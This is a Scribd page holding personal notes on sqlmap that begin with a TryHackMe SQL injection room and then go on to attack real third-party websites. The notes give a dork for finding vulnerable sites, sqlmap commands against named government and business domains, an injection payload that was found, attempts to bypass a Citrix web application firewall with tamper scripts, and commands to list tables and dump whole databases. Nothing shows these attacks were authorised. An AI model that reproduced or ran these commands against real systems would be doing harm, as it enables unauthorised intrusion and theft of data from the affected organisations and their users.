Scribd Logo
Upload

Welcome to Scribd!

  • SQLMAP

    Uploaded by

    Quratulain Tariq
    160 views5 pages
    The document discusses using sqlmap to find and exploit SQL injection vulnerabilities. It provides tips on using sqlmap to discover vulnerabilities, automate the scanning process, specify scanning techniques, view response headers, dump database contents, bypass web application firewalls, and leverage tampering scripts. The document also includes examples of the sqlmap commands used to scan websites, retrieve user and database details, find tables, columns, and dump the entire database contents.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document discusses using sqlmap to find and exploit SQL injection vulnerabilities. It provides tips on using sqlmap to discover vulnerabilities, automate the scanning process, specify scanning techniques, view response headers, dump database contents, bypass web application firewalls, and leverage tampering scripts. The document also includes examples of the sqlmap commands used to scan websites, retrieve user and database details, find tables, columns, and dump the entire database contents.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    160 views5 pages

    SQLMAP

    Uploaded by

    Quratulain Tariq
    The document discusses using sqlmap to find and exploit SQL injection vulnerabilities. It provides tips on using sqlmap to discover vulnerabilities, automate the scanning process, specify scanning techniques, view response headers, dump database contents, bypass web application firewalls, and leverage tampering scripts. The document also includes examples of the sqlmap commands used to scan websites, retrieve user and database details, find tables, columns, and dump the entire database contents.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    of 5

    SQL Attack

    https://tryhackme.com/room/sqlinjectionlm

    The key to discovering error-based SQL Injection is to break the code's SQL query by trying
    certain characters until an error message is produced; these are most commonly single
    apostrophes ( ' ) or a quotation mark ( " ).

    Try typing an apostrophe ( ' ) after the id=1 and press enter. And you'll see this returns an
    SQL error informing you of an error in your syntax. The fact that you've received this error
    message confirms the existence of an SQL Injection vulnerability. We can now exploit this
    vulnerability and use the error messages to learn more about the database structure. 

    SQL MAP
    https://www.youtube.com/watch?v=QsMkQMKsIII

    Note: After https://www.sngpl.com.pk/ ,try on http://berkeleyrecycling.org

    To find vulnerable site, write dork: inurl:php?id=1

    1) To automate (so it won’t ask for yes/no) use -> --batch


    2) To specify technique:

    Sqlmap –u http://www.abc.com –crawl 3 –technique=”U” (U means union and crawl 3 means crawl
    to the 3rd depth)

    3) For threads:

    4) When the tool can’t find vulnerabilities, it can look for risk by trying the payloads. We can
    give value 1, 2,3. It’ll check more severe Payloads by increasing the number from 1-3.

    5) When the tool can’t find vulnerabilities, we can increase levels to search for vulnerabilities
    for eg going to level ‘2’ it’ll check in the cookie for vulnerabilities and for level ‘3’ it’ll go in to
    ‘user- agent’ to check. Means we are increasing the range of our testing. We can assign
    values from 1-5.
    One thing to notice is that by increasing the ‘level’ and ‘risk’ the chances of false positives
    can increase.
    After the
    scan is completed, we can copy the vulnerable URL so to exploit it.

    6) Verbosity gives us the details while looking for vulnerabilities.

    2- it shows the debugging messages on the screen


    3- it shows the payload it is trying
    4- shows the http request (in which form it is going)
    5- response headers
    6- response page’s contents
    By default 1 is selected.

    To see http
    headers.

    7) If we have found vulnerable URL, how to exploit it or get more details out of it.
    I found the vulnerable URL of
    https://www.sngpl.com.pk/
    By writing command
    sqlmap -u https://www.sngpl.com.pk/ --crawl 2 --batch --threads 5 --risk 2 --level 1

    For current user

    For DB and hostname

    The results I got from the txt file~:


    web application technology: JSP
    back-end DBMS: Oracle
    Payload: pgids=3605' AND 6330=6330 AND
    'yeqQ'='yeqQ&pgname=PAGES_NAME_a&secs=ss7xa852op845&cats=ct456712337&artcl=a
    rtuyh709123465
    WAF/IPS identified as 'NetScaler AppFirewall (Citrix)

    8) For database details:

    sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 -D Oracle --tables --threads 5

    Results:

    No tables found in the Oracle database FOR sngpl

    Those I tried along with the others:

    https://www.mohtasibsindh.gov.pk/index.php?id=1

    https://www.minddesign.co.uk/show.php?id=174

    http://esjindex.org/search.php?id=1

    http://www.gdilabs.com/

    9)

    Things I tried to bypass WAF for sngpl website:

    sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --


    tamper="between,randomcase,space2comment" -D Oracle –tables

    Another command:

    sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --


    tamper="between,randomcase,space2comment" --dbms "Oracle" Oracle –schema

    https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap

    https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/

    https://securityonline.info/sqlmap-tamper-script-bypassing-waf/
    In temper option:
    apostrophemask.py,apostrophenullencode.py,appendnullbyte.py,base64encode.py,between.py,blu
    ecoat.py,chardoubleencode.py,charencode.py,charunicodeencode.py,concat2concatws.py,equaltoli
    ke.py,greatest.py,halfversionedmorekeywords.py,ifnull2ifisnull.py,lowercase.py,modsecurityversion
    ed.py,modsecurityzeroversioned.py,multiplespaces.py,nonrecursivereplacement.py,overlongutf8.py,
    percentage.py,randomcase.py,randomcomments.py,securesphere.py,sp_password.py,space2comm
    ent.py,space2dash.py,space2hash.py,space2morehash.py,space2mssqlblank.py,space2mssqlhash.py
    ,space2mysqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.p
    y,unmagicquotes.py,varnish.py,versionedkeywords.py,versionedmorekeywords.py

    10) Working on
    https://www.minddesign.co.uk/show.php?id=174
    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --current-user --current-db --
    hostname –batch

    11) For database details


    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --dbs

    database has some default files in “information_schema”

    12) To see tables


    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --tables

    13) To see all data of any table


    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T
    modern_cat –dump
    14)

    To see columns and their data types

    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat –


    columns

    14) To dump all data


    sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --dump-all

    You might also like